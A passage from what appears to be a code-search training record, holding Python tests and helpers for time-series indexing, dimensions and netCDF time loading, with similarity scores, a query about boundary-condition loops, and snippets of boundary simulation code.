time.spacing(times, times.freq),\n pd.Series(True, index=times)\n )", "def test_timeseries_indexing():\n s = channel.Slice(channel.TimeSeries([14, 15, 16, 17], [4, 5, 6, 7]))\n\n np.testing.assert_equal(s[0:5].data, [14])\n np.testing.assert_equal(s[0:5].timestamps, [4])\n np.testing.assert_equal(s[4:5].data, [14])\n np.testing.assert_equal(s[4:5].timestamps, [4])\n np.testing.assert_equal(s[4:6].data, [14, 15])\n np.testing.assert_equal(s[4:6].timestamps, [4, 5])\n np.testing.assert_equal(s[4:10].data, [14, 15, 16, 17])\n np.testing.assert_equal(s[4:10].timestamps, [4, 5, 6, 7])\n\n with pytest.raises(IndexError) as exc:\n assert s[1]\n assert str(exc.value) == \"Scalar indexing is not supported, only slicing\"\n with pytest.raises(IndexError) as exc:\n assert s[1:2:3]\n assert str(exc.value) == \"Slice steps are not supported\"\n\n s = channel.Slice(channel.TimeSeries([], []))\n assert len(s[1:2].data) == 0\n assert len(s[1:2].timestamps) == 0", "def test_time_supp_length_matches_no_timesteps(self):\n for no_timesteps in [5, 578, 993, 300072]:\n for dt in [0.1, 0.5, 3.0]:\n test_rec = rt.Recording(np.empty([6, no_timesteps, 1]), dt=dt)\n self.assertEqual(\n len(test_rec.time_supp),\n no_timesteps,\n 'Expected length of time_supp {} to match no_timesteps of '\n 'input {}.'.format(len(test_rec.time_supp), no_timesteps),\n )", "def test_copy(self):\n timestamp = \"2020-01-01\"\n measurement_copy = Measurement(self.metric(), start=timestamp, end=timestamp).copy()\n self.assertNotIn(timestamp, measurement_copy[\"start\"], measurement_copy[\"end\"])", "def test_fields_effort_time_units_dictionary_success(self, _mock_check):\n field = EffortField(time_units={\"minute\": (\"minute\", \"minutes\")})\n\n errors = field.check()\n self.assertEqual(len(errors), 0)", "def test_masked_upsampling(scheme):\n np.random.seed(2)\n\n orig = DummyDataset(shape=(2, 360, 720))\n orig.homogenise_masks()\n\n orig.cube.data.mask = orig.cube.data > 100\n\n reg = regrid(orig.cube, scheme=scheme)\n\n # Find the time slices with values above the original maximum or below the\n # original minimum.\n\n reg_time_maxs = np.max(reg.data, axis=(1, 2))\n reg_time_mins = np.min(reg.data, axis=(1, 2))\n\n extreme_times = np.where((reg_time_maxs > 150) | (reg_time_mins < -500))[0]\n\n assert not np.any(extreme_times)\n\n assert reg.shape[0] == orig.cube.shape[0]\n assert np.all(np.array(reg.shape[1:]) == 2 * np.array(orig.cube.shape[1:]))", "def test_overplotting(self):\n arr = self.arr\n out = ternary(arr)\n self.assertTrue(hasattr(out, \"tax\"))\n out2 = ternary(arr, ax=out)\n self.assertTrue(out.tax is out2.tax) # hasn't added a new ternary axis", "def test_update_derived_metric(self):\n pass", "def test_none_meet(self, initial_placement_fixture):\n assert len(ctx.cluster.influx_db.aggregate_performance()) == 0, \\\n \"Test should run on the basic model\"\n self.generic_function(above_objective=0)", "def test_TimeSeries():\r\n\r\n #Test initialization with duration:\r\n tseries1 = ts.TimeSeries([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], duration=10)\r\n tseries2 = ts.TimeSeries([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], sampling_interval=1)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n\r\n #downsampling:\r\n t1 = ts.UniformTime(length=8, sampling_rate=2)\r\n #duration is the same, but we're downsampling to 1Hz\r\n tseries1 = ts.TimeSeries(data=[1, 2, 3, 4], time=t1, sampling_rate=1)\r\n #If you didn't explicitely provide the rate you want to downsample to, that\r\n #is an error:\r\n npt.assert_raises(ValueError, ts.TimeSeries, dict(data=[1, 2, 3, 4],\r\n time=t1))\r\n\r\n tseries2 = ts.TimeSeries(data=[1, 2, 3, 4], sampling_rate=1)\r\n tseries3 = ts.TimeSeries(data=[1, 2, 3, 4], sampling_rate=1000,\r\n time_unit='ms')\r\n #you can specify the sampling_rate or the sampling_interval, to the same\r\n #effect, where specificying the sampling_interval is in the units of that\r\n #time-series:\r\n tseries4 = ts.TimeSeries(data=[1, 2, 3, 4], sampling_interval=1,\r\n time_unit='ms')\r\n npt.assert_equal(tseries4.time, tseries3.time)\r\n\r\n #The units you use shouldn't matter - time is time:\r\n tseries6 = ts.TimeSeries(data=[1, 2, 3, 4],\r\n sampling_interval=0.001,\r\n time_unit='s')\r\n npt.assert_equal(tseries6.time, tseries3.time)\r\n\r\n #And this too - perverse, but should be possible:\r\n tseries5 = ts.TimeSeries(data=[1, 2, 3, 4],\r\n sampling_interval=ts.TimeArray(0.001,\r\n time_unit='s'),\r\n time_unit='ms')\r\n\r\n npt.assert_equal(tseries5.time, tseries3.time)\r\n\r\n #initializing with a UniformTime object:\r\n t = ts.UniformTime(length=3, sampling_rate=3)\r\n\r\n data = [1, 2, 3]\r\n\r\n tseries7 = ts.TimeSeries(data=data, time=t)\r\n\r\n npt.assert_equal(tseries7.data, data)\r\n\r\n data = [1, 2, 3, 4]\r\n #If the data is not the right length, that should throw an error:\r\n npt.assert_raises(ValueError,\r\n ts.TimeSeries, dict(data=data, time=t))\r\n\r\n # test basic arithmetics wiht TimeSeries\r\n tseries1 = ts.TimeSeries([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], sampling_rate=1)\r\n tseries2 = tseries1 + 1\r\n npt.assert_equal(tseries1.data + 1, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n tseries2 -= 1\r\n npt.assert_equal(tseries1.data, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n tseries2 = tseries1 * 2\r\n npt.assert_equal(tseries1.data * 2, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n tseries2 /= 2\r\n npt.assert_equal(tseries1.data, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)", "def is_dimension_dynamic(dim) -> bool:\n return dim is None or dim <= 0", "def test_time_type_state_is_midmorning(day):\n\n assert day_time_info(day.hours_0).is_midmorning is False\n assert day_time_info(day.hours_1).is_midmorning is False\n assert day_time_info(day.hours_2).is_midmorning is False\n assert day_time_info(day.hours_3).is_midmorning is False\n assert day_time_info(day.hours_4).is_midmorning is False\n assert day_time_info(day.hours_5).is_midmorning is False\n assert day_time_info(day.hours_6).is_midmorning is False\n assert day_time_info(day.hours_7).is_midmorning is False\n assert day_time_info(day.hours_8).is_midmorning is False\n assert day_time_info(day.hours_9).is_midmorning is False\n assert day_time_info(day.hours_10).is_midmorning is True\n assert day_time_info(day.hours_11).is_midmorning is True\n assert day_time_info(day.hours_12).is_midmorning is False\n assert day_time_info(day.hours_13).is_midmorning is False\n assert day_time_info(day.hours_14).is_midmorning is False\n assert day_time_info(day.hours_15).is_midmorning is False\n assert day_time_info(day.hours_16).is_midmorning is False\n assert day_time_info(day.hours_17).is_midmorning is False\n assert day_time_info(day.hours_18).is_midmorning is False\n assert day_time_info(day.hours_19).is_midmorning is False\n assert day_time_info(day.hours_20).is_midmorning is False\n assert day_time_info(day.hours_21).is_midmorning is False\n assert day_time_info(day.hours_22).is_midmorning is False\n assert day_time_info(day.hours_23).is_midmorning is False", "def __check_per_timestep_params(\n self, variable, sampling_interval, indexes):\n if sampling_interval is not None:\n raise ValueError(\n f\"Variable {variable} does not support a sampling interval\")\n if indexes is not None:\n raise ValueError(\n f\"Variable {variable} can only be recorded \"\n \"on the whole population\")", "def test_plt_v2offset_time():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_v2offset_time()\n\n assert bokeh_plot_type == type(result)", "def test_sample_from_extra_bounds_good(self):\n dim = Real(\"yolo\", \"norm\", 0, 2, low=-5, high=+5, shape=(4, 4))\n for _ in range(8):\n samples = dim.sample(8)\n for sample in samples:\n assert sample in dim", "def test_baseupdated(self):\n self.assertEqual(datetime, type(BaseModel().updated_at))", "def test_is_time_druid_time_col(self):\n col = TableColumn(column_name=\"__time\", type=\"INTEGER\")\n self.assertEquals(col.is_dttm, None)\n DruidEngineSpec.alter_new_orm_column(col)\n self.assertEquals(col.is_dttm, True)\n\n col = TableColumn(column_name=\"__not_time\", type=\"INTEGER\")\n self.assertEquals(col.is_time, False)", "def test_reset_temporal_axis(PM_ds_control_3d_full):\r\n smooth = 10\r\n tsmooth_kws = {\"time\": smooth}\r\n first_ori = PM_ds_control_3d_full.time[0].values\r\n first_actual = _reset_temporal_axis(\r\n PM_ds_control_3d_full, tsmooth_kws=tsmooth_kws, dim=\"time\"\r\n ).time.values[0]\r\n first_expected = f\"{first_ori}-{first_ori+smooth*1-1}\"\r\n assert first_actual == first_expected", "def test_time_type_state_is_morning(day):\n\n assert day_time_info(day.hours_0).is_morning is False\n assert day_time_info(day.hours_1).is_morning is False\n assert day_time_info(day.hours_2).is_morning is False\n assert day_time_info(day.hours_3).is_morning is False\n assert day_time_info(day.hours_4).is_morning is False\n assert day_time_info(day.hours_5).is_morning is True\n assert day_time_info(day.hours_6).is_morning is True\n assert day_time_info(day.hours_7).is_morning is True\n assert day_time_info(day.hours_8).is_morning is True\n assert day_time_info(day.hours_9).is_morning is True\n assert day_time_info(day.hours_10).is_morning is False\n assert day_time_info(day.hours_11).is_morning is False\n assert day_time_info(day.hours_12).is_morning is False\n assert day_time_info(day.hours_13).is_morning is False\n assert day_time_info(day.hours_14).is_morning is False\n assert day_time_info(day.hours_15).is_morning is False\n assert day_time_info(day.hours_16).is_morning is False\n assert day_time_info(day.hours_17).is_morning is False\n assert day_time_info(day.hours_18).is_morning is False\n assert day_time_info(day.hours_19).is_morning is False\n assert day_time_info(day.hours_20).is_morning is False\n assert day_time_info(day.hours_21).is_morning is False\n assert day_time_info(day.hours_22).is_morning is False\n assert day_time_info(day.hours_23).is_morning is False", "def test_dimension_size_infer(self, nt=100):\n i, j, k = dimify('i j k')\n shape = tuple([d.size for d in [i, j, k]])\n a = DenseData(name='a', shape=shape).indexed\n b = TimeData(name='b', shape=shape, save=True, time_dim=nt).indexed\n eqn = Eq(b[time, x, y, z], a[x, y, z])\n op = Operator(eqn)\n\n _, op_dim_sizes = op.arguments()\n assert(op_dim_sizes[time.name] == nt)", "def test_one_meet(self, initial_placement_fixture):\n assert len(ctx.cluster.influx_db.aggregate_performance()) == 0, \\\n \"Test should run on the basic model\"\n self.generic_function(above_objective=1)", "def test_tas_fix():\n assert Tas is BaseTas", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", "def test_subset_by_time(self):\n\n this_satellite_dict = satellite_io.subset_by_time(\n satellite_dict=copy.deepcopy(SATELLITE_DICT_ALL_EXAMPLES),\n desired_times_unix_sec=DESIRED_TIMES_UNIX_SEC\n )[0]\n\n self.assertTrue(compare_satellite_dicts(\n this_satellite_dict, SATELLITE_DICT_SUBSET_BY_TIME\n ))", "def test_datetime_field():", "def test_not_at_beginning(self):\n self.check_4_way('container', 'container or pod')", "def test_ensure_ts_double(self):\n self.assertEqual(ensure_ts(self.jobset3), 'ts')", "def should_fire(self, time_domain, timestamp, window, context):\n pass", "def test_interval_from_categorical(self, tdim2):\n low, high = tdim2.interval()\n assert (low == numpy.zeros(4)).all()\n assert (high == numpy.ones(4)).all()", "def test_interval(self):\n dim = Dimension(\"yolo\", \"uniform\", -3, 4)\n assert dim.interval(1.0) == (\n -3.0,\n 1.0,\n ) # reminder that `scale` is not upper bound", "def test_ensure_not_ts_ts(self):\n self.assertEqual(ensure_not_ts(self.jobset3), 'error')", "def test_time_type_state_is_afternoon(day):\n\n assert day_time_info(day.hours_0).is_afternoon is False\n assert day_time_info(day.hours_1).is_afternoon is False\n assert day_time_info(day.hours_2).is_afternoon is False\n assert day_time_info(day.hours_3).is_afternoon is False\n assert day_time_info(day.hours_4).is_afternoon is False\n assert day_time_info(day.hours_5).is_afternoon is False\n assert day_time_info(day.hours_6).is_afternoon is False\n assert day_time_info(day.hours_7).is_afternoon is False\n assert day_time_info(day.hours_8).is_afternoon is False\n assert day_time_info(day.hours_9).is_afternoon is False\n assert day_time_info(day.hours_10).is_afternoon is False\n assert day_time_info(day.hours_11).is_afternoon is False\n assert day_time_info(day.hours_12).is_afternoon is False\n assert day_time_info(day.hours_13).is_afternoon is True\n assert day_time_info(day.hours_14).is_afternoon is True\n assert day_time_info(day.hours_15).is_afternoon is True\n assert day_time_info(day.hours_16).is_afternoon is True\n assert day_time_info(day.hours_17).is_afternoon is True\n assert day_time_info(day.hours_18).is_afternoon is False\n assert day_time_info(day.hours_19).is_afternoon is False\n assert day_time_info(day.hours_20).is_afternoon is False\n assert day_time_info(day.hours_21).is_afternoon is False\n assert day_time_info(day.hours_22).is_afternoon is False\n assert day_time_info(day.hours_23).is_afternoon is False", "def test_contains_extra_bounds(self):\n dim = Real(\"yolo\", \"norm\", 0, 3, low=-3, high=+3)\n assert dists.uniform.rvs(-3, 3) in dim\n assert -4 not in dim\n assert +4 not in dim\n assert (1, 2) not in dim", "def isdt(self):\n return self.Units.isreftime and self._subarray.dtype == _dtype_object", "def test_time_type_state_is_evening(day):\n\n assert day_time_info(day.hours_0).is_evening is False\n assert day_time_info(day.hours_1).is_evening is False\n assert day_time_info(day.hours_2).is_evening is False\n assert day_time_info(day.hours_3).is_evening is False\n assert day_time_info(day.hours_4).is_evening is False\n assert day_time_info(day.hours_5).is_evening is False\n assert day_time_info(day.hours_6).is_evening is False\n assert day_time_info(day.hours_7).is_evening is False\n assert day_time_info(day.hours_8).is_evening is False\n assert day_time_info(day.hours_9).is_evening is False\n assert day_time_info(day.hours_10).is_evening is False\n assert day_time_info(day.hours_11).is_evening is False\n assert day_time_info(day.hours_12).is_evening is False\n assert day_time_info(day.hours_13).is_evening is False\n assert day_time_info(day.hours_14).is_evening is False\n assert day_time_info(day.hours_15).is_evening is False\n assert day_time_info(day.hours_16).is_evening is False\n assert day_time_info(day.hours_17).is_evening is False\n assert day_time_info(day.hours_18).is_evening is True\n assert day_time_info(day.hours_19).is_evening is True\n assert day_time_info(day.hours_20).is_evening is True\n assert day_time_info(day.hours_21).is_evening is True\n assert day_time_info(day.hours_22).is_evening is True\n assert day_time_info(day.hours_23).is_evening is False", "def test_default_axis_type(i07_nexus: I07Nexus, description):\n assert i07_nexus.default_axis_type == description", "def test_no_timestamp(self):\n self.assertRaises(PyntsError, extract_columns, self.data[['a', 'b']], ['a'], ['timestamp'])", "def _load_time(self):\n\n time_variables = ('time', 'Times', 'Itime', 'Itime2')\n got_time, missing_time = [], []\n for time in time_variables:\n # Since not all of the time_variables specified above are required, only try to load the data if they\n # exist. We'll raise an error if we don't find any of them though.\n if time in self.ds.variables:\n setattr(self.time, time, self.ds.variables[time][:])\n got_time.append(time)\n attributes = type('attributes', (object,), {})()\n for attribute in self.ds.variables[time].ncattrs():\n setattr(attributes, attribute, getattr(self.ds.variables[time], attribute))\n setattr(self.atts, time, attributes)\n else:\n missing_time.append(time)\n\n if len(missing_time) == len(time_variables):\n warn('No time variables found in the netCDF.')\n else:\n if 'Times' in got_time:\n # Overwrite the existing Times array with a more sensibly shaped one.\n self.time.Times = np.asarray([''.join(t.astype(str)).strip() for t in self.time.Times])\n\n # Make whatever we got into datetime objects and use those to make everything else. Note: the `time' variable\n # is often the one with the lowest precision, so use the others preferentially over that.\n if 'Times' not in got_time:\n if 'time' in got_time:\n _dates = num2date(self.time.time, units=getattr(self.ds.variables['time'], 'units'))\n elif 'Itime' in got_time and 'Itime2' in got_time:\n _dates = num2date(self.time.Itime + self.time.Itime2 / 1000.0 / 60 / 60, units=getattr(self.ds.variables['Itime'], 'units'))\n try:\n self.time.Times = np.array([datetime.strftime(d, '%Y-%m-%dT%H:%M:%S.%f') for d in _dates])\n except ValueError:\n self.time.Times = np.array([datetime.strftime(d, '%Y/%m/%d %H:%M:%S.%f') for d in _dates])\n # Add the relevant attribute for the Times variable.\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'Times', attributes)\n\n if 'time' not in got_time:\n if 'Times' in got_time:\n try:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y-%m-%dT%H:%M:%S.%f') for t in self.time.Times])\n except ValueError:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y/%m/%d %H:%M:%S.%f') for t in self.time.Times])\n elif 'Itime' in got_time and 'Itime2' in got_time:\n _dates = num2date(self.time.Itime + self.time.Itime2 / 1000.0 / 60 / 60, units=getattr(self.ds.variables['Itime'], 'units'))\n # We're making Modified Julian Days here to replicate FVCOM's 'time' variable.\n self.time.time = date2num(_dates, units='days since 1858-11-17 00:00:00')\n # Add the relevant attributes for the time variable.\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'units', 'days since 1858-11-17 00:00:00')\n setattr(attributes, 'long_name', 'time')\n setattr(attributes, 'format', 'modified julian day (MJD)')\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'time', attributes)\n\n if 'Itime' not in got_time and 'Itime2' not in got_time:\n if 'Times' in got_time:\n try:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y-%m-%dT%H:%M:%S.%f') for t in self.time.Times])\n except ValueError:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y/%m/%d %H:%M:%S.%f') for t in self.time.Times])\n elif 'time' in got_time:\n _dates = num2date(self.time.time, units=getattr(self.ds.variables['time'], 'units'))\n # We're making Modified Julian Days here to replicate FVCOM's 'time' variable.\n _datenum = date2num(_dates, units='days since 1858-11-17 00:00:00')\n self.time.Itime = np.floor(_datenum)\n self.time.Itime2 = (_datenum - np.floor(_datenum)) * 1000 * 60 * 60 # microseconds since midnight\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'units', 'days since 1858-11-17 00:00:00')\n setattr(attributes, 'format', 'modified julian day (MJD)')\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'Itime', attributes)\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'units', 'msec since 00:00:00')\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'Itime2', attributes)\n\n # Additional nice-to-have time representations.\n if 'Times' in got_time:\n try:\n self.time.datetime = np.array([datetime.strptime(d, '%Y-%m-%dT%H:%M:%S.%f') for d in self.time.Times])\n except ValueError:\n self.time.datetime = np.array([datetime.strptime(d, '%Y/%m/%d %H:%M:%S.%f') for d in self.time.Times])\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'long_name', 'Python datetime.datetime')\n setattr(self.atts, 'datetime', attributes)\n else:\n self.time.datetime = _dates\n self.time.matlabtime = self.time.time + 678942.0 # convert to MATLAB-indexed times from Modified Julian Date.\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'long_name', 'MATLAB datenum')\n setattr(self.atts, 'matlabtime', attributes)\n\n # Clip everything to the time indices if we've been given them. Update the time dimension too.\n if 'time' in self._dims:\n if all([isinstance(i, (datetime, str)) for i in self._dims['time']]):\n # Convert datetime dimensions to indices in the currently loaded data.\n self._dims['time'][0] = self.time_to_index(self._dims['time'][0])\n self._dims['time'][1] = self.time_to_index(self._dims['time'][1]) + 1 # make the indexing inclusive\n for time in self.obj_iter(self.time):\n setattr(self.time, time, getattr(self.time, time)[self._dims['time'][0]:self._dims['time'][1]])\n self.dims.time = len(self.time.time)" ]
[ "0.6225104", "0.61606276", "0.60171777", "0.59855527", "0.5899436", "0.5890807", "0.57126755", "0.56421477", "0.5499632", "0.5453681", "0.54009974", "0.53884566", "0.53690064", "0.534088", "0.5325772", "0.5315858", "0.530437", "0.5300429", "0.52890176", "0.5282546", "0.52745104", "0.5273178", "0.5268156", "0.52672786", "0.52665734", "0.52570873", "0.5230689", "0.5218409", "0.521682", "0.5206447", "0.52033246", "0.5190876", "0.5172476", "0.51574016", "0.5147732", "0.5144025", "0.51393306", "0.51385033", "0.51261693", "0.51226014", "0.5118929", "0.5102286", "0.5098599", "0.50902086", "0.50893354", "0.50843817", "0.50836176", "0.5078468", "0.506827", "0.5067612", "0.5065614", "0.5054767", "0.50530916", "0.50505334", "0.5048112", "0.5046467", "0.50453806", "0.50193775", "0.50153565", "0.5003251", "0.5002558", "0.5001993", "0.50007886", "0.49991366", "0.49980867", "0.49926907", "0.4992489", "0.49901158", "0.49858645", "0.49818453", "0.49812666", "0.4981111", "0.49784097", "0.49756134", "0.49697188", "0.49696308", "0.49695843", "0.4964584", "0.49517176", "0.4950993", "0.4947086", "0.49465567", "0.49452066", "0.4943919", "0.49399668", "0.4927577", "0.4926833", "0.49246964", "0.4921574", "0.49148595", "0.49144667", "0.49130312", "0.49087495", "0.48986292", "0.4897352", "0.48937902", "0.48914686", "0.4890034", "0.48898396", "0.48830923" ]
0.6123395
2
Emulates a potential implementation of boundary condition loops
def test_directly_indexed_expression(self, fa, ti0, t0, exprs): eqs = EVAL(exprs, ti0.base, t0) op = Operator(eqs, dse='noop', dle='noop') trees = retrieve_iteration_tree(op) assert len(trees) == 2 assert trees[0][-1].nodes[0].expr.rhs == eqs[0].rhs assert trees[1][-1].nodes[0].expr.rhs == eqs[1].rhs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def simulate_boundary(self,print_every=1000,do_F_bound=True):\n n_t = self.t_span.size\n self.n_t = n_t\n x = self.x0.copy()\n self._triangulate(x)\n self.assign_vertices()\n x = self.check_boundary(x)\n self.x = x.copy()\n self.x_save = np.ones((n_t,int(self.n_c*self.b_extra),2))*np.nan\n self.tri_save = -np.ones((n_t,int(self.tris.shape[0]*self.b_extra),3),dtype=np.int32)\n self.generate_noise_boundary()\n if do_F_bound is True:\n for i in range(n_t):\n if i % print_every == 0:\n print(i / n_t * 100, \"%\")\n self.triangulate(x,recalc_angles=True)\n self.assign_vertices()\n x = self.check_boundary(x)\n self.tri_save[i,:self.tris.shape[0]] = self.tris\n self.get_A(self.neighbours,self.vs)\n self.get_P(self.neighbours,self.vs)\n F = self.get_F(self.neighbours,self.vs)\n # F_bend = get_F_bend(self.n_c, self.CV_matrix, self.n_C, x, self.zeta)\n F_soft = weak_repulsion_boundary(self.Cents,self.a,self.k, self.CV_matrix,self.n_c,self.n_C)\n F_bound = boundary_tension(self.Gamma_bound,self.n_C,self.n_c,self.Cents,self.CV_matrix)\n x += self.dt*(F + F_soft + self.v0*self.noise[i,:x.shape[0]] + F_bound)\n # + F_bend + F_bound\n\n self.x = x\n self.x_save[i,:x.shape[0]] = x\n else:\n for i in range(n_t):\n if i % print_every == 0:\n print(i / n_t * 100, \"%\")\n self.triangulate(x, recalc_angles=True)\n self.assign_vertices()\n x = self.check_boundary(x)\n self.tri_save[i, :self.tris.shape[0]] = self.tris\n self.get_A(self.neighbours, self.vs)\n self.get_P(self.neighbours, self.vs)\n F = self.get_F(self.neighbours, self.vs)\n F_soft = weak_repulsion_boundary(self.Cents, self.a, self.k, self.CV_matrix, self.n_c, self.n_C)\n x += self.dt * (F + F_soft + self.v0 * self.noise[i, :x.shape[0]])\n\n self.x = x\n self.x_save[i, :x.shape[0]] = x\n print(\"Simulation complete\")\n return self.x_save", "def boundary_conditions(self):\n ce = 2 * self.dy * self.g * self.mu * self.m_u / self.kb\n self.e[0, :] = (4 * self.e[1, :] - self.e[2, :]) / (\n ce / self.T[0, :] + 3\n )\n self.rho[0, :] = (\n self.e[0, :]\n * (self.Y - 1)\n * self.mu\n * self.m_u\n / (self.kb * self.T[0, :])\n )\n self.u[0, :] = (4 * self.u[1, :] - self.u[2, :]) / 3\n self.w[0, :] = 0\n\n self.e[-1, :] = (4 * self.e[-2, :] - self.e[-3, :]) / (\n 3 - ce / self.T[-1, :]\n )\n self.rho[-1, :] = (\n self.e[-1, :]\n * (self.Y - 1)\n * self.mu\n * self.m_u\n / (self.kb * self.T[-1, :])\n )\n self.u[-1, :] = (4 * self.u[-2, :] - self.u[-3, :]) / 3\n self.w[-1, :] = 0", "def apply_boundary_conditions(self):\n E = self.__mesh.get_edge_list()\n\n # Top and bottom wall Dirichlet bcs (boundary_id = 21)\n \n e21_iterator = self.__mesh.edge_iterator(21)\n\n self.edge_center_value[e21_iterator[0]:e21_iterator[1]+1] = 0.0 \n \n # Left Dirichlet bc (boundary_id = 2)\n \n e2_iterator = self.__mesh.edge_iterator(2)\n\n b = np.sin(np.pi*self.y_e[e2_iterator[0]:e2_iterator[1]+1])\n\n self.edge_center_value[e2_iterator[0]:e2_iterator[1]+1] \\\n = b\n \n # Right Neumann bc (Zero flux, boundary_id = 3)\n \n e3_iterator = self.__mesh.edge_iterator(3)\n \n for i in range(e3_iterator[0], e3_iterator[1]+1):\n LC = E[i].get_straddling_cells()\n n = LC.get_global_cell_number() - 1\n self.edge_center_value[i] = self.cell_centroid_value[n]", "def set_internal_boundary_conditions(self, model):\n\n def boundary_gradient(left_symbol, right_symbol):\n pybamm.logger.debug(\n \"Calculate boundary gradient ({} and {})\".format(\n left_symbol, right_symbol\n )\n )\n left_domain = left_symbol.domain[0]\n right_domain = right_symbol.domain[0]\n\n left_mesh = self.spatial_methods[left_domain].mesh[left_domain]\n right_mesh = self.spatial_methods[right_domain].mesh[right_domain]\n\n left_symbol_disc = self.process_symbol(left_symbol)\n right_symbol_disc = self.process_symbol(right_symbol)\n\n return self.spatial_methods[left_domain].internal_neumann_condition(\n left_symbol_disc, right_symbol_disc, left_mesh, right_mesh\n )\n\n bc_keys = list(self.bcs.keys())\n\n internal_bcs = {}\n for var in model.boundary_conditions.keys():\n if isinstance(var, pybamm.Concatenation):\n children = var.orphans\n\n first_child = children[0]\n next_child = children[1]\n\n lbc = self.bcs[var][\"left\"]\n rbc = (boundary_gradient(first_child, next_child), \"Neumann\")\n\n if first_child not in bc_keys:\n internal_bcs.update({first_child: {\"left\": lbc, \"right\": rbc}})\n\n for current_child, next_child in zip(children[1:-1], children[2:]):\n lbc = rbc\n rbc = (boundary_gradient(current_child, next_child), \"Neumann\")\n if current_child not in bc_keys:\n internal_bcs.update(\n {current_child: {\"left\": lbc, \"right\": rbc}}\n )\n\n lbc = rbc\n rbc = self.bcs[var][\"right\"]\n if children[-1] not in bc_keys:\n internal_bcs.update({children[-1]: {\"left\": lbc, \"right\": rbc}})\n\n self.bcs.update(internal_bcs)", "def boundary_sim(x0y0, exy0, a, X,D, xmin,ymax, R2,c, tmax,expmt, PBC, vb=False):\r\n\tme = \"LE_2DLBS.boundary_sim: \"\r\n\t\r\n\t## Initialisation\r\n\tx0,y0 = x0y0\r\n\tnstp = int(tmax/dt)\r\n\texstp = nstp/10\r\n\tif vb: print me+\"a = \",a,\"; (x0,y0) =\",np.around(x0y0,2)\r\n\t\r\n\t## Simulate eta\r\n\tif vb: t0 = time.time()\r\n\tex = sim_eta(exy0[0], expmt, nstp, a, dt)\r\n\tey = sim_eta(exy0[1], expmt, nstp, a, dt)\r\n\tif vb: print me+\"Simulation of eta\",round(time.time()-t0,1),\"seconds for\",nstp,\"steps\"\r\n\t\r\n\t## Spatial variables\r\n\tif vb: t0 = time.time()\r\n\t\r\n\t## Construct y with periodic boundaries\r\n\ty = calculate_y(y0,ey,ymax,PBC)\r\n\t\r\n\t## Iteratively compute x\r\n\tx = np.zeros(nstp); x[0] = x0\r\n\ti,j = 0,0\r\n\t## Euler steps to calculate x(t)\r\n\twhile x[i] > xmin:\r\n\t\tx[i+1] = x[i] + dt*( force_2D(x[i],y[i],R2,c) + ex[i] )\r\n\t\ti +=1\r\n\t\t## Extend array if necessary\r\n\t\tif i == len(x)-1:\r\n\t\t\tex = np.append(ex,sim_eta(ex[-1],expmt[:exstp],exstp,a,dt))\r\n\t\t\tx = np.append(x,np.zeros(exstp))\r\n\t\t\tey_2 = sim_eta(ey[-1],expmt[:exstp],exstp,a,dt)\r\n\t\t\tey = np.append(ey,ey_2)\r\n\t\t\ty = np.append(y,calculate_y(y[-1],ey_2,ymax,PBC))\r\n\t\t\tj += 1\r\n\tif j>0: print me+\"trajectory array extended\",j,\"times.\"\r\n\tif vb: print me+\"Simulation of x\",round(time.time()-t0,1),\"seconds for\",i,\"steps\"\r\n\t\r\n\t## Clip trailing zeroes from y and x\r\n\tx, y = x[:i], y[:i]\t\r\n\treturn [x,y]", "def GetBoundaryLoops(self):\n\n self.__do_essential_memebers_exist__()\n\n if self.InferBoundaryElementType() != \"line\":\n raise NotImplementedError(\"Computing boundary loops is only supported for tri/quad meshes for now\")\n\n self.GetEdges()\n\n # First create a node to neighbour map i.e. node as key and its two neighbouring nodes as value\n nodeToNeighboursMap = dict()\n for i in range(self.edges.shape[0]):\n\n if self.edges[i,0] not in nodeToNeighboursMap:\n nodeToNeighboursMap[self.edges[i,0]] = [self.edges[i,1],-1]\n else:\n nodeToNeighboursMap[self.edges[i,0]][1] = self.edges[i,1]\n\n if self.edges[i,1] not in nodeToNeighboursMap:\n nodeToNeighboursMap[self.edges[i,1]] = [self.edges[i,0],-1]\n else:\n nodeToNeighboursMap[self.edges[i,1]][1] = self.edges[i,0]\n\n # Now create a vector of face loops\n faceLoops = []\n while nodeToNeighboursMap:\n # Insert the first node from node to edge map and its two neighbours in order and erase it from the map\n faceLoop = []\n mapBegin = next(iter(nodeToNeighboursMap))\n faceLoop.append(nodeToNeighboursMap[mapBegin][0])\n faceLoop.append(mapBegin)\n faceLoop.append(nodeToNeighboursMap[mapBegin][1])\n nodeToNeighboursMap.pop(mapBegin, None)\n\n while True:\n # Pick the last node in the current face loop and find its neighbours\n if faceLoop[-1] in nodeToNeighboursMap:\n tmp = faceLoop[-1]\n mapIter = 